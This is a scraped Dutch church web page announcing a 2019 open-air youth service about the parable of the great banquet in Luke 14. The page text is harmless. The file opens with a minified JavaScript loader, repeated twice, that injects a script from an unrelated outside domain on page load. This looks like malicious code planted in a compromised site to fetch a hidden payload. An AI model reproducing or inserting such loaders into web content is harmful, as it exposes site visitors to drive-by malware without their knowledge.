;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De kerk op straat ... Younited jeugdkerk - PKN Damwâld

De kerk op straat … Younited jeugdkerk

Gepubliceerd op: maandag 3 juni 2019

Thema: De kerk op straat
Datum: zondag 23 juni 2019
Tijd: 16:00
Spreker: Robert Colijn
Band: Soon Return
Locatie: De Ontmoeting, Foarwei 48 Damwâld

Dat is vervelend! Je organiseert een groot feest en je nodigt mensen uit en… dan wil niemand komen. De één moet op de kinderen passen, de ander heeft al een ander feestje en weer een ander zegt dat hij ziek is. Dit hebben we allemaal wel eens meegemaakt of misschien hebben we zelf wel eens zo’n smoesje bedacht.

In deze dienst kijken we samen naar de gelijkenis over de heer die een feestmaal had bereid. Eerst liet hij alle rijke mensen uitnodigen, maar die waren allemaal te druk om te komen. De heer liet toen de kreupelen, verlamden en blinden uitnodigen voor zijn feest en samen genoten ze van het grote feestmaal. Deze gelijkenis is te vinden in Lucas 14. Hoe zouden we zelf reageren op een uitnodiging van onze Heer? Hebben we het te druk met van alles, komt het op een andere keer beter uit en zijn we nu nét ergens anders mee bezig?

Deze dienst zal anders zijn dan alle voorgaande jeugddiensten. Het Younited-team heeft deze keer een openluchtdienst georganiseerd. Wij hopen iedereen op zondag 23 juni te zien bij deze bijzondere dienst gevuld met muziek, toneel en een goed verhaal!

Na afloop van de dienst is er een verrassing voor jullie bij ’t Honk achter de kerk.